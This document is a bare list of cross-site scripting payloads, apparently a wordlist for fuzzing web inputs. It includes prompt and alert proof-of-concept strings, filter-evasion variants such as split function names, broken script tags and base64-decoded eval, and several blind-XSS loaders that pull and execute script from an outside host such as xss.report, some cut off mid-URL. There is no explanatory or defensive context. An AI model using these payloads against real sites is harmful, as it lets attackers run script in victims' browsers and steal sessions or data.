"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
'"><script>alert(XSS)</script>
<script>alert(1)</script>
XSS
onmouseover="alert(1)"
<a onclick="alert(1)">test</a>
'"><script src=https://xss.report/
"><img src=x id=
"><input onfocus=eval(atob(this.id)) id=
"><video><source onerror=eval(atob(this.id)) id=
<script>$.getScript("//
var a=document.createElement("script");a.src="https://
"><video><source onerror=eval(atob(this.id)) id=
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "https://
'%22%3E%3Cscript%20src=https://
'%22%3E%3Cscript%20src=
